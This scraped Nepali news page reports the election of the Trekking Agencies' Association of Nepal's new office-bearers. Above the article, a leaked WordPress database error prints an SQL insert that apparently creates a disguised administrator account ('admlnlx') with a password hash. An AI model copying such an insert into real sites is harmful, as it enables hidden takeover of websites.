WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B9u7U8hfbYKO1fP.z29OhJAXh9m03..', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 10:19:24', '', 'admlnlx', 'admlnlx')
काठमाडौं। पर्यटन व्यवसायीहरुको छाता संगठन ट्रेकिङ एजेन्सिज एसोसिएशन अफ नेपाल ९टान० को अध्यक्षमा निलहरि बास्तोला निर्वाचित भएका छन्।
काठमाडौंमा गएराति सम्पन्न मतगणनामा प्रतिस्पर्धी रामप्रसाद सापकोटालाई हराउँदै पूर्वउपाध्यक्षसमेत रहेका बास्तोला अध्यक्षमा निर्बाचित भएका हुन्।
टानको वरिष्ठ उपाध्यक्षमा कृष्णप्रसाद दाहाल, प्रथम उपाध्यक्षमा प्रतित पण्डित, द्धितिय उपाध्यक्षमा धनबहादुर गुरुङ, महासचिवमा विनोद सापकोटा, कोषाध्यक्षमा पुरूषोत्तम तिमल्सिना, सहकोषाध्यक्षमा छिरिङ दोर्जे शेर्पा र सचिवमा होमनाथ खड्का निर्वाचित भएका छन्।